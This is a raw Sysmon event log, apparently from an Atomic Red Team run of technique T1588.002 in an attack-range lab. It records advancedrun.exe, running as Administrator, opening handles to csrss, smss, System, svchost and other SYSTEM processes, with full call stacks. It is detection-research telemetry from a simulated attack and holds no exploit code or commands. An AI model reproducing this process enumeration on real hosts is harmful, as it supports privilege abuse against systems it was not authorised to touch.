17:59:00.663{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0500-000000002702}420C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983022Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:00.663{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF2-61EA-2C00-000000002702}2896C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983021Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:00.663{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE2-61EA-0200-000000002702}320C:\Windows\System32\smss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983020Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:00.663{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF2-61EA-2B00-000000002702}2888C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 734700x80000000000000003983019Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.663{834264DD-F464-61EA-7D04-000000002702}4584C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\psapi.dll10.0.14393.0 (rs1_release.160715-1616)Process Status HelperMicrosoft® Windows® Operating SystemMicrosoft CorporationPSAPIMD5=7B73FC5AD82AF0FB84212106455E0D48,SHA256=CF6A2C746B3A9B9294A41DE686ED35FC99BB6A8ABEA7DC6A81D15C67613B98D6trueMicrosoft WindowsValidATTACKRANGE\Administrator 10341000x80000000000000003983018Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:00.663{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF0-61EA-2900-000000002702}2760C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983017Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:00.663{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE8-61EA-2000-000000002702}1516C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003983016Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:00.663{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE2-61EA-EB03-000000000000}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983015Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:00.663{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1800-000000002702}1384C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003983014Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:00.663{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1700-000000002702}1300C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983013Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:00.663{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1600-000000002702}1264C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003983012Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:00.663{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1500-000000002702}1064C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003983011Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:00.663{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1400-000000002702}352C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003983010Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:00.663{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1300-000000002702}832C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003983008Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:00.663{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1200-000000002702}820C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorWindow Manager\DWM-1 10341000x80000000000000003983007Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:00.663{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1100-000000002702}488C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983006Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:00.663{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1000-000000002702}92C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 